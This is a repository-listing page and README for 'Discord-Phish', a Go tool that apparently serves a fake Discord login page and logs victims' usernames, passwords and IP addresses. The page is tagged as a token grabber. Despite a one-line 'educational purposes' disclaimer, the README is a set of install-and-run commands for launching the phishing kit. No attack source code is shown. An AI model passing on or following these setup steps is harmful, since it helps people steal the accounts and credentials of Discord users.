https://github.com/euronymou5/discord-phish
Tool for linux coded in golang for phishing technique focused on discord website
https://github.com/euronymou5/discord-phish
discord discord-phish discord-phishing discord-token-grabber discord-token-logger golang gophish phish phishing phishing-attacks phishing-servers zphisher
Last synced: 2 months ago
JSON representation
Tool for linux coded in golang for phishing technique focused on discord website
- Host: GitHub
- URL: https://github.com/euronymou5/discord-phish
- Owner: Euronymou5
- License: mpl-2.0
- Created: 2023-02-17T01:51:56.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2023-02-17T04:01:37.000Z (over 2 years ago)
- Last Synced: 2025-03-26T00:36:01.310Z (3 months ago)
- Topics: discord, discord-phish, discord-phishing, discord-token-grabber, discord-token-logger, golang, gophish, phish, phishing, phishing-attacks, phishing-servers, zphisher
- Language: CSS
- Homepage:
- Size: 295 KB
- Stars: 10
- Watchers: 2
- Forks: 2
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# Discord-Phish
**• Tool for linux made in golang for phishing technique focused on discord website.**
**• This tool is made for educational purposes, to demonstrate how phishing works, i am not responsible for the misuse that may be given to this tool, it is at your own risk.**
----------------------
# Use And Installation## Requirements
• `Git`
• `Go`
• `PHP`
• `SSH`
Only compatible with linux!!
## Tested in
*Kali Linux: ✔*
*Parrot OS: ✔*
*Ubuntu: ✔*
> Install "go"
```bash
sudo apt install go -y
```> Make sure you have ssh installed
```bash
sudo apt install openssh -y
```> Install "php"
```bash
sudo apt install php -y
```> Clone the repository
```bash
git clone https://github.com/Euronymou5/Discord-Phish
```> Enter the folder "Discord-Phish"
```bash
cd Discord-Phish
```> Start the tool
```bash
go run phish.go
```
--------------# Imagenes
| Main Menu | User logs, username, password, ip |
| -------------- | ----------------|
||# Contact
**Discord: Euronymou5#3155**
**https://twitter.com/Euronymou51**